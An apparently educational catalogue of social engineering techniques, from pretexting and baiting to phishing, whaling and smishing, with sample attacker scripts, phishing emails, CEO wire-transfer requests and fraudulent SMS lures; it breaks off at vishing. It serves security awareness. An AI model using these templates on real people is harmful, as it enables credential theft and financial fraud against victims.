Social Engineering Examples

A collection of real-world social engineering techniques used in cybersecurity, complete with examples and explanations.

🧠 Pretexting – Fake Identity Used to Gain Trust

📌 Description:

Pretexting is a form of social engineering where the attacker fabricates a scenario (pretext) to trick the target into providing information or performing actions they normally wouldn’t. The attacker builds trust using a false identity or story.

🧪 Common Examples of Pretexting:

1. Fake IT Support

Scenario: The attacker calls or emails pretending to be from the internal IT department.

Message:
"Hi, we’re doing urgent system maintenance. Please confirm your login details so we can upgrade your email system."

✅ Result: Victim gives credentials thinking it’s a trusted IT admin.

2. HR or Recruitment Scam

Scenario: The attacker pretends to be from the HR department.

Message:
"We’re updating our employee records. Can you send me your personal details and a copy of your ID for verification?"

✅ Result: Attacker collects sensitive documents like SSN, ID proof, etc.

3. Bank Impersonation

Scenario: Attacker pretends to be from the user’s bank.

Message:
"We noticed suspicious activity in your account. We need to verify your identity. Can you confirm your card number and CVV?"

✅ Result: Attacker steals card info for fraud.

4. Journalist or Researcher

Scenario: The attacker acts as a journalist or student doing a study.

Message:
"I’m a student doing a cybersecurity project. Can I ask you a few questions about your company’s infrastructure or network setup?"

✅ Result: Sensitive organizational info is leaked.

5. Fake Delivery or Maintenance Worker

Scenario: The attacker wears a uniform or fakes a work order.

Message:
"I’m here to fix a reported network issue. I need temporary access to your server room."

✅ Result: Gains unauthorized physical access.

6. Executive or Manager Spoof

Scenario: Attacker poses as a senior employee.

Message:
"This is John from Finance. Can you urgently send me the customer list for Q2 reporting?"

✅ Result: Employees comply due to perceived authority.

7. Fake Law Enforcement or Government Agent

Scenario: Impersonates a cop or auditor.

Message:
"This is Officer Davis. We are conducting a cyber fraud investigation. We need access to your logs and user database."

✅ Result: Victim shares confidential data thinking it’s a legal request.

🎣 Baiting – Social Engineering Technique

Definition:
Baiting is a social engineering technique that lures the victim using a physical or digital "bait"—usually something desirable or intriguing, like free items, leaked content, or insider info. Once the victim interacts with the bait, they unintentionally give the attacker access to their system, credentials, or personal data.

💼 Real-World Examples of Baiting

🔌 1. Infected USB in Parking Lot

An attacker drops multiple USB sticks in a corporate parking area. The drives are labeled “Q4_Bonus_Salaries.pdf” or “HR Reports - Confidential.” A curious employee plugs it into their work laptop — triggering malware that installs a remote access trojan (RAT).

💰 2. Fake Job Offer File

A USB sent to a target via post with a letter saying:
“You're shortlisted for the Senior Security Analyst role. Open the attached portfolio file to confirm your availability.”
The USB launches a keylogger when inserted.

🎮 3. Free Gaming Cheats or Cracks

A bait file posted on a forum promising “Free Valorant Aimbot Hack”. When downloaded and run, it installs spyware and steals gaming credentials or payment data.

💾 4. Free Movie Leak or Celebrity Content

A download link spreading on WhatsApp/Telegram labeled:
“🔞 Leaked Celebrity Video HD.mp4”
Victims download and run it—infecting their system or getting redirected to phishing sites.

💻 5. Infected Public Charging Station (Juice Jacking)

A charging station in an airport or hotel has been modified to install malware when a phone is connected via USB. Victims unknowingly allow data access or malicious code injection.

🧲 6. Online Giveaway Page

A malicious site offering “Free iPhone Giveaway – Enter to Win!”
When the user signs up, they are asked for personal data (phishing) or redirected to malware downloads.

📁 7. File-Sharing Platform Trap

An attacker uploads a malware-laden file to Google Drive or Dropbox with a name like “Company Layoff List 2025.pdf”, then shares the link in employee forums or email groups.

🛡️ Prevention Tips:

Don't use untrusted USB drives: Avoid plugging random USBs into your systems.
Verify downloads: Only download software and files from reputable sources.
Secure public charging stations: Use your own charging cable and avoid public USB ports.
Use antivirus software: Ensure your system has updated antivirus/malware protection.

Quid Pro Quo – Exchange-Based Manipulation

Quid Pro Quo (Latin for "something for something") is a social engineering technique where the attacker offers something of value in exchange for sensitive information or access. The attacker creates an illusion of reciprocity, making the victim believe they are receiving a legitimate service or reward in exchange for personal or company data.

⚙️ How It Works

The attacker typically pretends to offer some form of assistance or reward in return for sensitive information. The victim, believing they are getting a beneficial exchange, provides access or personal details that are later used for malicious purposes, such as stealing data, installing malware, or committing fraud.

💡 Examples of Quid Pro Quo Attacks

1. Fake Tech Support Offering Help in Exchange for Access

Scenario:
An attacker calls an employee pretending to be from the company’s IT support team, stating that their computer has been flagged for security issues. The attacker offers to solve the problem remotely if the employee grants access to their machine.
Outcome:
The employee believes they are receiving legitimate support and provides remote access, allowing the attacker to install malware or steal sensitive information.
Example Variation:
"I'm from IT. I can help you get rid of that virus on your computer if you just provide your login credentials for verification."

2. Fake Job Offer for Personal Information

Scenario:
An attacker impersonates a recruiter or HR representative and sends an email offering a job interview. To proceed with the job offer, the attacker asks the victim to fill out a form containing personal information, such as social security numbers or bank details.
Outcome:
The victim, believing they are advancing in a job application process, shares sensitive personal data. The attacker uses this information for identity theft or to conduct further attacks.
Example Variation:
"As part of our hiring process, we need to confirm your bank details for direct deposit purposes. This step will speed up your application."

3. Free Software in Exchange for Login Credentials

Scenario:
An attacker offers free software or an extended trial in exchange for login credentials. To claim the free offer, the victim must provide their company or personal login information.
Outcome:
The victim unknowingly provides login credentials, which the attacker then uses to gain unauthorized access to the system or network.
Example Variation:
"Sign up for this free premium tool, and all we need is your company login credentials for verification. You’ll get a 1-year free license!"

4. Free Wi-Fi Access in Exchange for Login Information

Scenario:
An attacker sets up a fake Wi-Fi hotspot in a public location and offers "free internet access." The victim is prompted to log in through a captive portal, which requests sensitive information such as email and passwords.
Outcome:
The attacker collects the victim’s login credentials or other sensitive data once they log into the fake Wi-Fi network.
Example Variation:
"Get free internet access by logging into our Wi-Fi portal. We just need your name, email, and password to get started."

5. Free Malware Removal in Exchange for System Access

Scenario:
The attacker claims that the victim’s system is infected with malware and offers free help in removing it. The victim is asked to grant remote access to their computer for the “fix.”
Outcome:
Once remote access is granted, the attacker installs additional malware or steals sensitive information from the victim’s system.
Example Variation:
"We’ve noticed unusual activity on your system. Let us help you clean up the malware for free—just let us access your computer remotely for a quick fix."

Authority Exploitation

Description:
Authority exploitation involves impersonating someone in a position of power, such as law enforcement, senior management, or IT personnel, to gain unauthorized access to sensitive information or resources. People are more likely to comply with individuals who appear to have authority, making this one of the most effective social engineering techniques.

Common Authority Exploitation Scenarios

1.1 Impersonating Law Enforcement

Scenario: An attacker poses as a law enforcement officer and contacts the HR department, requesting employee records for an ongoing investigation.
Example Statement:

"This is Officer Smith from the local police department. We're conducting an investigation, and we need to verify the identity of John Doe, who works in your HR department. Can you send me his employment records and personal details right away?"

1.2 Impersonating a Senior Manager or Executive (CEO Fraud)

Scenario: The attacker impersonates a high-ranking executive, such as the CEO or CFO, to request financial transfers or sensitive company data.
Example Email:
Subject: Urgent – Please Transfer Funds to Vendor ASAP

"Hi [Employee Name],
I need you to wire $50,000 to a vendor urgently for an ongoing project. Please prioritize this task and send me a confirmation when done. Regards, [CEO Name]."

1.3 Impersonating a System Administrator

Scenario: The attacker calls the IT department pretending to be a system administrator, requesting remote access to address a "security issue."
Example Statement:

"Hi, this is John from the IT support team. We’ve detected unusual activity in your department’s network, and I need to check your system immediately. Please provide me with admin access so I can resolve the issue right away."

1.4 Impersonating a Vendor or Partner

Scenario: The attacker poses as a trusted business partner or vendor conducting routine audits or security checks, asking for access to sensitive business systems or documents.
Example Phone Call:

"Hello, I’m Michael from [Vendor Name]. We need to verify some internal systems as part of our quarterly audit. I’ll need access to your project files and some authentication details to complete our review."

1.5 Impersonating a Compliance Officer

Scenario: The attacker calls an employee, claiming to be from the company's compliance or legal department, asking for sensitive financial or personal information for an "audit."
Example Statement:

"This is Jennifer from the Compliance Department. We need to verify some tax-related information for your department’s records. Please provide your employee details and tax information immediately for the audit."

Urgency Creation – “Act Fast or Lose Access!” Style Pressure

This social engineering technique relies on creating a sense of urgency to pressure the victim into acting quickly without thinking, which makes them more likely to make mistakes. The attacker plays on the victim's fear of missing out (FOMO) or fear of losing something important.

Here are some examples of Urgency Creation in social engineering:

1. Phishing Email with Account Lock Threat

Scenario: You receive an email that claims your account will be locked unless you take immediate action.
Example:

Subject: “URGENT: Your account is about to be suspended!
Body:
Dear User,
Our system has detected suspicious activity on your account. If you do not respond within the next 24 hours, your account will be permanently suspended. Please click the link below to verify your identity:
[Click here to verify account].
Act fast before it's too late!
Regards,
[Fake Company Name] Security Team."

2. Fake Bank Alert - Immediate Action Required

Scenario: An attacker sends a fake bank notification claiming your account has been compromised.
Example:

Subject: “Immediate Action Required: Unusual Transaction Detected on Your Account!”
Body:
Dear Customer,
We have detected unusual activity in your account and suspect it has been compromised. To secure your funds, please log in immediately and confirm your account details. If you don’t respond within 30 minutes, your account will be temporarily locked for security reasons.
[Log in to secure your account now]

3. Ransomware Threat

Scenario: A malicious email warns that your files will be deleted unless you pay a ransom.
Example:

Subject: “Your files are locked – Pay now to restore access!”
Body:
Hello,
Your system has been compromised, and all your important files are encrypted. To regain access, you must pay the ransom within the next 48 hours. Failure to comply will result in permanent data loss.
Pay the ransom by clicking this link to prevent further loss: [Pay Now].
Time is running out!

4. Urgent Update Required - Fake Software Update

Scenario: An attacker sends a message or notification pretending to be from software support, pressuring the victim to install a malicious update.
Example:

Message:
“URGENT: Security Update Available!
Your software is outdated and vulnerable to cyber-attacks. Please update within the next 15 minutes to prevent your data from being exposed. Failure to do so will leave your system vulnerable to hackers.”
[Click here to download the urgent update].

5. Fake Lottery Win – Claim Your Prize Now!

Scenario: A fake lottery or prize-winning scam claims you have won something valuable and urges you to act quickly.
Example:

Subject: “Congratulations! You’ve won a $1,000 Amazon Gift Card!
Body:
You have just won a $1,000 Amazon Gift Card! But you must claim your prize within the next hour or it will be forfeited! To claim your prize, please click the link below and enter your details:
[Claim Your Prize].
Hurry, your prize expires soon!

6. Security Breach - Change Password Immediately

Scenario: A message or email claims your account has been breached, and you must change your password immediately.
Example:

Subject: “Security Alert: Your Account Has Been Breached”
Body:
Dear [Your Name],
We have detected a security breach in your account. To prevent further unauthorized access, please change your password within the next 10 minutes. If you fail to do so, your account may be locked indefinitely.
Click here to change your password immediately: [Change Password Now].

7. Tech Support Scam – Immediate Fix Required

Scenario: A call or email claiming to be from technical support urges you to act fast to fix a supposed computer issue.
Example:

Phone Call or Email:
“Hello, this is [Tech Company Name] support. We’ve detected a critical error in your system. Please allow us remote access immediately to fix the problem, or your device will become unusable within 30 minutes. Please call us back urgently at [fake number] to resolve this issue.”

8. Fake Subscription Renewal

Scenario: An attacker pretends to be a subscription service (e.g., Netflix, Amazon Prime) and pressures the victim into renewing or paying for a service to avoid cancellation.
Example:

Subject: “Immediate Action Needed: Your Subscription Is About to Expire!”
Body:
Dear User,
Your Netflix subscription is about to expire today! If you don’t renew it within the next hour, you will lose access to all your content. Please click the link below to renew your subscription and enjoy uninterrupted access.
[Renew Now].

Fear Tactics – Scaring Users into Acting

Fear tactics exploit the psychological manipulation of users by creating a sense of urgency or panic, pushing them to make hasty decisions. Below are some of the most common fear-based social engineering techniques used in cyberattacks, along with examples.

1. Account Lock/Deactivation Warning

Description: Users are warned that their account will be locked or deactivated unless they take immediate action.
Example:
An attacker sends an email disguised as a popular service provider (e.g., a bank, social media) with the subject:
"URGENT: Your account has been compromised – Immediate action required!"
The body of the email threatens account deactivation unless the victim clicks on a link to verify their details.

2. Fake Legal Threats

Description: Victims are informed that they are under investigation for illegal activity and must resolve the issue immediately.
Example:
A fake email, pretending to be from law enforcement or tax authorities, claims:
"You are under investigation for tax fraud. Failure to respond will result in arrest and legal consequences."
The email includes a phone number or link to “contact support.”

3. Ransomware Scare

Description: Users are warned that their system has been infected with ransomware and that their files will be deleted unless a ransom is paid.
Example:
A pop-up claims:
"Your computer is infected with ransomware. Your files will be permanently deleted unless you pay a $500 fee to restore them."
The user is given a countdown timer to act before the files are allegedly wiped.

4. Fake Tech Support Scams

Description: Attackers pose as tech support agents and convince the victim their system has been compromised.
Example:
An attacker calls, claiming to be from the victim's internet service provider (ISP), saying:
"We’ve detected a serious security breach on your network. If you don’t act immediately, your personal data will be stolen."
The victim is instructed to download a remote access tool or pay for unnecessary repairs.

5. Financial Loss/Identity Theft Warnings

Description: Victims are threatened with financial loss or identity theft if they don’t act immediately.
Example:
An email or SMS reads:
"ALERT: Suspicious activity detected in your bank account. Your funds will be transferred unless you verify your details within the next 24 hours."
The user is directed to a fake banking website to enter account information.

6. Cyber Attack/Threat Warning

Description: Victims are informed that their system has been compromised by a cyberattack.
Example:
A fake email from “Microsoft Security” warns:
"ALERT: A hacker has breached your account. Your personal information is at risk. You need to secure your account immediately."
The email contains a link to a malicious website that asks for login details.

7. Fake Emergency or Family Crisis

Description: Attackers create a fake emergency involving a family member, forcing the victim to act quickly.
Example:
An attacker calls, posing as a relative, saying:
"This is your daughter/son. I’ve been arrested in another country and need money for bail. Please send money right now!"

📚 Greed Triggers – “Win $1,000 Now!” Lures

Greed triggers exploit people's desire to obtain something valuable quickly or with minimal effort. These social engineering tactics promise rewards or winnings to get the victim to take action, often leading to data theft, malware infection, or financial loss.

1. Fake Prize Draws

Example 1:
Message: “Congratulations! You've won a $1,000 gift card! Just click the link to claim your prize.”
How it works: The victim clicks the link and is asked to enter personal information or payment details to "claim" the prize. The link might also lead to a fake login page that steals credentials.
Example 2:
Message: “You’ve been selected for a special offer worth $1,000. Complete a quick survey to receive your reward!”
How it works: After filling out the survey, the user is redirected to malicious sites or asked for financial information.

2. Fake Investment Opportunities

Example 1:
Message: “Invest $100 today and get $1,000 within a week. Limited time offer!”
How it works: A fake cryptocurrency or stock market website is presented. The user deposits money but sees no return, or the website disappears with the funds.
Example 2:
Message: “Guaranteed return on investment – earn up to $1,000 weekly! Don’t miss out!”
How it works: The attacker entices victims into sending money to an unverified investment account with the promise of high returns.

3. "Limited Time" Offers on Fake E-commerce Sites

Example 1:
Message: “Hurry! Limited time offer – Buy this phone for only $1 and get a free $1,000 voucher for your next purchase.”
How it works: Victims place an order, but the phone never arrives, and their payment information is stolen in the process.
Example 2:
Message: “Get an iPhone for just $1 today! Click here to get yours before the offer ends!”
How it works: The victim enters personal information to make the "purchase" but ends up giving up credit card details or downloading malware.

4. Fake Charity Donations

Example 1:
Message: “Help children in need and get a tax rebate of $1,000! Donate now!”
How it works: A fake charity website convinces the user to donate to a cause that doesn't exist. The donation is stolen, and the victim gains nothing in return.
Example 2:
Message: “Donate $10 to this cause and enter a draw to win $1,000!”
How it works: Victim donates money to a fake cause, expecting a reward, but the "reward" is nonexistent, and the attacker collects the funds.

5. Fake Job Offers/Recruitment

Example 1:
Message: “Earn $1,000 a week working from home! Click here to apply now!”
How it works: The user is led to a job application form that asks for personal information and sometimes payment for “background checks” or “training fees.”
Example 2:
Message: “Start your own business for just $99, and earn $1,000 per day. Limited spots available!”
How it works: Victims pay to access what seems like a business opportunity but end up receiving little to no value in return.

Phishing – Generic Fake Emails

Phishing is one of the most common social engineering attacks where attackers send fraudulent emails that appear to come from trusted sources to steal sensitive information like usernames, passwords, or credit card details.

Examples of Phishing Emails:

Example 1: Fake Bank Alert

Subject: URGENT: Your Account Has Been Suspended

Body:

Dear Valued Customer,

We have noticed unusual activity in your account. To ensure the security of your account, we have temporarily suspended it. Please click the link below to confirm your account details and restore full access.

[Restore Account] – www.fakebank-link.com

If you do not respond within 24 hours, your account will be permanently suspended.

Thank you for your understanding.

Best regards, Fake Bank Security Team

Why it's phishing: The urgency and fake "security alert" make the user feel pressured to act fast, leading them to enter sensitive information on a fake website.

Example 2: Fake Shipping Notification

Subject: Your Package is Waiting for Delivery!

Body:

Dear Customer,

We are unable to deliver your package due to an incomplete address. Please click the link below to update your shipping information and ensure your package is delivered within the next 48 hours.

[Update Shipping Info] – www.fake-shipping.com

Failure to provide updated details will result in the return of your package.

Thank you, Fake Shipping Service

Why it's phishing: The attacker uses the fake shipping notification to convince the target to click a link and submit personal details.

Example 3: Fake Account Verification

Subject: Action Required: Verify Your Account

Body:

Dear User,

We noticed that you have not verified your account. To ensure uninterrupted access, please click the link below to complete your verification.

[Verify Account Now] – www.fake-verify-site.com

Failure to verify your account within 48 hours will result in a temporary lock.

Thank you, Fake Online Platform Support Team

Why it's phishing: It creates a false sense of urgency and tricks the user into entering their login credentials on a fraudulent site.

Example 4: Fake Invoice Notification

Subject: Invoice #12345 – Payment Due

Body:

Dear [Your Name],

Attached is the invoice for the recent service rendered. Kindly process the payment as soon as possible to avoid any late fees. You can download the invoice by clicking the link below.

[Download Invoice] – www.fake-invoice.com

If you have any questions, feel free to contact our billing department.

Best regards, Fake Billing Department

Why it's phishing: The attacker uses a common tactic where an “invoice” is sent with a link that contains malware or a phishing site to steal financial details.

Example 5: Fake Social Media Login

Subject: Important: Your Social Media Account is Inactive

Body:

Dear [User],

We’ve noticed that your social media account has been inactive for over 30 days. To reactivate it, please verify your login details by clicking the link below:

[Reactivate Account] – www.fake-social-media.com

Please note that if you don't reactivate within 48 hours, your account may be permanently deleted.

Best, Fake Social Media Team

Why it's phishing: The email mimics a social media platform’s notification to steal login credentials.

Example 6: Fake Tech Support Alert

Subject: Immediate Attention Required: System Update Needed

Body:

Dear User,

Our system has detected a critical issue with your computer. Please click the link below to run an urgent update and prevent further damage to your system.

[Download System Update] – www.fake-tech-support.com

If you don't act now, your device may become vulnerable to hackers.

Sincerely, Fake Tech Support Team

Why it's phishing: The attacker pretends to be a tech support team, directing the victim to download malware disguised as an update.

Example 7: Fake Prize Notification

Subject: Congratulations! You've Won a Gift Card!

Body:

Dear Winner,

Congratulations! You have been selected to receive a $500 gift card. To claim your prize, please click the link below and fill in your contact details.

[Claim Your Gift Card] – www.fake-giftcard.com

Hurry, this offer is only available for the next 24 hours!

Best regards, Fake Prize Team

Spear Phishing: Targeted, Personalized Emails

Definition:
Spear phishing is a highly targeted form of phishing where an attacker customizes the email to a specific individual or organization. Unlike generic phishing attacks, spear phishing is tailored with personal details, making it more convincing.

🎯 Key Characteristics of Spear Phishing:

Personalized Information: The attacker gathers details about the victim (e.g., name, job title, work relationships) through social media, company websites, or other OSINT sources.
Trust Exploitation: The email might appear to come from someone the victim knows, such as a colleague, boss, or service provider.
Goal: Usually, the aim is to steal login credentials, financial information, or to convince the target to click on malicious links or download attachments.

📧 Examples of Spear Phishing Emails

1. Example: HR-related Attack

Subject: "Action Required: Employee Benefits Enrollment"
From: “HR Department” (hr@company.com)
Body:

Dear John Doe,

This is a reminder that your benefits enrollment is due for this year. Please review your current coverage and select your preferences by following the link below.

Click here to update your information: [Malicious Link]

If you do not make any changes by the end of this month, your benefits will be automatically renewed.

Regards, HR Department

How It Works:

The attacker uses a name from the target's organization to make the email look legitimate.
The link leads to a fake HR portal designed to capture login credentials.

2. Example: CEO Fraud

Subject: “Urgent Request - Immediate Action Required”
From: “CEO” (ceo@company.com)
Body:

Hi Sarah,

I need you to process an urgent wire transfer of $50,000 to the vendor as soon as possible. Please use the banking details I’ve shared below. Time is of the essence, and I trust you’ll handle this promptly.

Bank Account: [Fake Account Information]

Let me know once it's done.

Thanks, James (CEO)

How It Works:

The attacker impersonates the CEO and requests a high-value wire transfer.
It relies on the victim trusting the sender and acting quickly without verifying.

3. Example: IT Department Impersonation

Subject: “Your Password Needs to Be Reset”
From: “IT Support” (it-support@company.com)
Body:

Dear Mark,

We’ve detected unusual activity on your account, and for your security, your password must be updated immediately. Please follow the link below to change your password:

[Malicious Link]

If you do not reset your password within 24 hours, your account will be locked.

Regards, IT Support Team

How It Works:

The attacker impersonates the IT support team and creates a sense of urgency.
The link leads to a fake login page designed to steal the user’s credentials.

4. Example: Vendor Invoice

Subject: “Invoice for Services Rendered - Payment Due”
From: “Vendor Name” (vendor@company.com)
Body:

Dear Michael,

I hope this email finds you well. Attached is the invoice for the services provided last week. Kindly review it and process payment by the end of the week.

Invoice: [Fake Invoice Attachment]

How It Works:

The attacker impersonates a legitimate vendor and includes an attachment that contains malware or prompts the victim to click on malicious links.
The victim might trust the invoice if the attacker has researched the company’s vendors.

5. Example: Customer Support Phishing

Subject: “Account Suspension Notice”
From: “Customer Support” (support@company.com)
Body:

Dear Emma,

We noticed that there was an issue with your recent purchase. Your account will be suspended unless we can confirm your payment information.

Please update your billing details as soon as possible by clicking the link below:

[Fake Payment Page Link]

Thank you for your prompt attention to this matter.

Best regards, Customer Support Team

How It Works:

The attacker creates a sense of urgency and uses the victim’s name to build trust.
The malicious link leads to a fake login or payment page to steal payment details.

Curiosity Traps

Description:
Curiosity Traps exploit the natural human urge to be curious. Attackers craft suspicious or intriguing subject lines to trick users into clicking on links. The goal is to trigger a knee-jerk response to "find out more" without critically evaluating the content.

Examples of Curiosity Traps:

1. Video of You

Subject Line:
"This video of you is hilarious! Check it out!"
Description:
Victims are likely to click on the link, thinking it's a funny or embarrassing video of themselves, but it could lead to a phishing page or malware download.

2. Unexpected Package

Subject Line:
"You have a package waiting for you! Track it now."
Description:
The attacker entices the victim with the promise of an unknown package, creating a sense of urgency. The link could direct them to a phishing page requesting personal information.

3. Suspicious Activity Alert

Subject Line:
"Your account shows suspicious activity! Click here to secure your account."
Description:
A message that creates fear and curiosity around potential account issues, prompting the victim to click on the link to resolve it.

4. Who Viewed Your Profile

Subject Line:
"Someone just viewed your profile! See who it is."
Description:
A typical curiosity trap where the victim wants to know who's interested in them. The link leads to a fake login page designed to steal credentials.

5. Missing Payment Notification

Subject Line:
"We couldn’t process your payment. Check the details."
Description:
Victims are tricked into opening the email, thinking there's a problem with a recent transaction. This could be a phishing attempt for banking or credit card details.

6. Important Document

Subject Line:
"You’ve received a new important document."
Description:
This uses curiosity around official or urgent matters. The link may prompt the victim to download an attachment or visit a malicious website.

7. Urgent Security Notice

Subject Line:
"Immediate action required: Security breach detected."
Description:
Creates urgency by claiming a security breach, prompting the victim to click and “secure” their account, often leading to malicious websites.

8. "You’ve Been Tagged!"

Subject Line:
"You’ve been tagged in a new photo!"
Description:
The victim is lured into thinking they've been tagged on social media. Clicking the link leads them to a phishing page or malware download disguised as a social media site.

9. "A Secret Admirer Sent You a Message!"

Subject Line:
"A secret admirer just sent you a message. Find out who!"
Description:
This plays on romantic curiosity and can trick victims into clicking a link that either steals their personal information or infects their device with malware.

10. New Job Opportunity

Subject Line:
"New job opportunity waiting for you! Apply now."
Description:
A tempting job offer could lead to the victim submitting their personal details to a fake site or downloading harmful files.

Trust Exploitation – Using Friendly Tone, Shared Interests, etc.

Description:
Trust exploitation involves gaining a victim's trust by using a friendly tone, building rapport through shared interests, or emotional manipulation. Attackers can exploit the victim’s trust to extract sensitive information, access systems, or perform unintended actions.

Key Elements:

Friendly tone and familiarity: Making the target feel comfortable through emotional appeal or shared interests.
Creating authority: Establishing trust via insider language or appearing knowledgeable.
Building rapport: Establishing common ground, like mutual hobbies or shared work tasks.

Example 1: Friendly Email Approach

Scenario: An attacker targets an employee in the marketing department by posing as an old friend from college.

Example Email:

"Hey [Target’s Name],
Long time no see! I hope you’re doing well. I was going through some of my old files and came across some of our college memories. It reminded me how you always knew how to handle marketing campaigns.
I’m currently working with a client who could really benefit from your expertise. Would love to get your thoughts on their strategy. Here’s a link to the draft I’ve been working on. Let me know what you think!
Cheers,
[Attacker’s Name]"

Goal: The target clicks on the link (which contains malware) because they trust the friendly tone and the apparent mutual connection.

Example 2: Mutual Interest – Sports Teams or Hobbies

Scenario: An attacker connects with someone on LinkedIn based on a shared interest in a sports team or hobby.

Example Message:

"Hey [Target’s Name],
I noticed we’re both huge [Team Name] fans! I went to the game last weekend and had a blast. Looks like we’re finally getting some momentum this season, right?
By the way, I’m also in the IT industry, and I wanted to reach out since we’re both in the same space. I’d love to chat more about how [Company Name] is handling [specific tech challenge]. Let me know if you’re free to talk sometime this week!
Best,
[Attacker’s Name]"

Goal: The attacker builds a friendly connection through the shared hobby, making the target more likely to trust and engage with the attacker. This might lead to them sharing sensitive company details in the conversation.

Example 3: Building a Fake Relationship – Tech Support Impersonation

Scenario: An attacker impersonates a friendly tech support agent reaching out to an employee.

Example Call:

"Hi [Target’s Name],
This is [Attacker’s Name] from IT support. We’ve been working closely with your department to improve system security, and I just wanted to check in to see how everything’s going.
I noticed you might have some pending system updates that need to be installed. I can walk you through the process if you’d like! It’ll only take a few minutes. Just need to get your login credentials to start. It’s a simple procedure to make sure your account is fully protected!"

Goal: The attacker sounds friendly and knowledgeable, creating a false sense of trust. The victim is more likely to share their login credentials under the guise of routine maintenance.

Example 4: Exploiting Emotional Vulnerability – Birthday Greetings

Scenario: An attacker, who has been following the target’s social media, learns that the target's birthday is coming up.

Example Message:

"Hi [Target’s Name],
I saw on Facebook that your birthday is coming up – Happy Early Birthday! I wanted to get you something special, and I was thinking about sending you a little surprise gift. To make sure I’ve got the right address, could you confirm it for me? I’d love to send something you’d really enjoy. Looking forward to celebrating with you!
Best wishes,
[Attacker’s Name]"

Goal: The attacker exploits the emotional connection (birthday) to manipulate the target into revealing personal information, such as their home address.

Example 5: Impersonating a Coworker for Info Exchange

Scenario: The attacker pretends to be a colleague to request confidential information.

Example Email:

"Hi [Target’s Name],
It’s [Attacker’s Name] from the finance team. I hope you’re doing well! I’m currently reviewing some of our financial data for this quarter, and I was wondering if you could send me the latest expense report from last month. I’ve been so swamped with deadlines, and it’d save me a ton of time!
Thanks so much!
[Attacker’s Name]"

Goal: The attacker uses a tone of friendliness and urgency, making the request seem normal and reasonable. The target, seeing the familiar name, might be more willing to share sensitive files without questioning.

🐋 Whaling – Targeting High-Value Individuals

Whaling is a sophisticated form of spear phishing that targets high-profile individuals, such as CEOs, CFOs, executives, and other key decision-makers within an organization. Unlike regular phishing, which may target a broader audience, whaling is specifically designed to exploit the trust and authority of high-ranking officials in order to gain access to sensitive information, steal funds, or compromise the organization.

Key Characteristics of Whaling:

Highly Personalized: Whaling attacks are usually tailored with specific details about the individual or company to make the attack look legitimate.
Authority-Based: The attacker often impersonates someone in a position of authority, such as a senior executive, lawyer, or government official.
Targeting High-Value Victims: High-profile individuals, especially those with access to critical company assets, are the main targets.

Examples of Whaling Attacks

1. Fake CEO Email Asking for Money Transfer

Scenario: A cybercriminal impersonates the CEO of a company and sends an email to the CFO with an urgent request for a wire transfer.
Email Content:

“Hi [CFO],
I need you to urgently wire $500,000 to a client account today. This is extremely confidential, and I can’t discuss it over the phone. Please handle this right away and send me confirmation as soon as possible.
Regards,
[Fake CEO Name]”
Goal: The CFO believes the request is legitimate and proceeds with the wire transfer, which is intercepted by the attacker.

2. Fake Legal Notice from a Regulatory Authority

Scenario: An attacker impersonates a legal or regulatory authority (e.g., tax office) and sends a fake legal notice to the CEO or legal team.
Email Content:

“Dear [CEO Name],
We have received a report indicating that your company has failed to comply with recent regulatory updates. Please review the attached document for more details.
Immediate action is required, and failure to do so will result in penalties.
Regards,
[Fake Name], Regulatory Officer, [Fake Regulatory Agency Name]”
Goal: The victim opens the attachment containing malware or provides sensitive data in response.

3. Fake Tax Document from IRS or Tax Authorities

Scenario: The attacker impersonates a tax authority (e.g., IRS) and emails the CFO or financial director about an urgent tax issue.
Email Content:

“Dear [CFO],
Our records show that your company has an outstanding tax balance. Please review the attached statement and remit payment immediately to avoid penalties.
Regards,
[Fake Tax Officer Name], IRS Tax Department”
Goal: The victim downloads an infected attachment or clicks on a phishing link.

4. Fake Job Offer or Contract

Scenario: An attacker impersonates a high-ranking official (e.g., HR director) and emails the target with a fake job offer.
Email Content:

“Dear [Target Name],
We are pleased to inform you that you have been selected for a position with our company. To proceed, kindly sign the attached contract document, and we will send further instructions.
Regards,
[Fake HR Director Name]”
Goal: The victim clicks on a malicious attachment or provides sensitive personal information.

5. Invoice Scam (Impersonating a Trusted Partner)

Scenario: The attacker impersonates a business partner or vendor, sending a fake invoice to the executive or accounting team.
Email Content:

“Dear [CFO Name],
Attached is the invoice for the products/services delivered last month. Kindly make payment by the due date to avoid a disruption in services.
Regards,
[Fake Partner Name]”
Goal: The victim pays the fraudulent invoice, which is intercepted by the attacker.

6. Fake Press Release or Media Coverage

Scenario: The attacker impersonates a media outlet or press agency, sending an email to the CEO claiming they have been featured in an important article.
Email Content:

“Dear [CEO],
We are pleased to inform you that your company has been selected for an exclusive feature in [Fake Media Outlet Name]. Kindly review the attached document for approval before we go to print.
Regards,
[Fake Editor Name], [Fake Media Outlet Name]”
Goal: The victim opens the document, which contains a malicious link or document with embedded malware.

Smishing – Phishing via SMS

Smishing (SMS Phishing) is a type of social engineering attack where attackers send fraudulent text messages (SMS) to trick recipients into revealing sensitive information like passwords, credit card numbers, or to install malware on their devices.

Below are some real-world Smishing examples to help understand how attackers use this technique:

Example 1: Fake Bank Alert

Message:
"Alert: Your bank account has been compromised. To secure your account, click the link and verify your identity: [malicious_link]"
Impact:
The user clicks the link, leading to a fake login page that steals banking credentials.

Example 2: Package Delivery Scam

Message:
"Your package is waiting for delivery. To reschedule, click here: [malicious_link]"
Impact:
The link either asks for personal details or installs malware upon clicking.

Example 3: Prize or Gift Claim

Message:
"Congratulations! You've won a $1000 gift card. Claim your prize now: [malicious_link]"
Impact:
Clicking the link may ask for personal or financial information in exchange for the "prize."

Example 4: Fake Two-Factor Authentication

Message:
"Your Google account is logging in from a new device. To confirm, click here: [malicious_link]"
Impact:
This attempts to phish user credentials, allowing attackers to take control of accounts.

Example 5: Fake Tax Refund

Message:
"The IRS is processing your tax refund. Click the link to receive your refund: [malicious_link]"
Impact:
The link leads to a fraudulent IRS page asking for social security numbers and bank details.

Example 6: Fake Job Offer

Message:
"Great news! You’ve been selected for an interview with [Company]. Click the link to confirm your details and schedule: [malicious_link]"
Impact:
The link collects personal details or spreads malware once clicked.

Example 7: Subscription Renewal Scam

Message:
"Your Netflix subscription is about to expire. Click here to renew your subscription: [malicious_link]"
Impact:
The link redirects the user to a fake login page to steal Netflix credentials.

📞 Vishing – Phishing via Voice Calls

Vishing is a type of phishing attack where attackers impersonate trusted entities via phone calls to steal personal information or money from victims. Here are some common Vishing tactics:

1. Bank Account Verification Scam

Scenario:
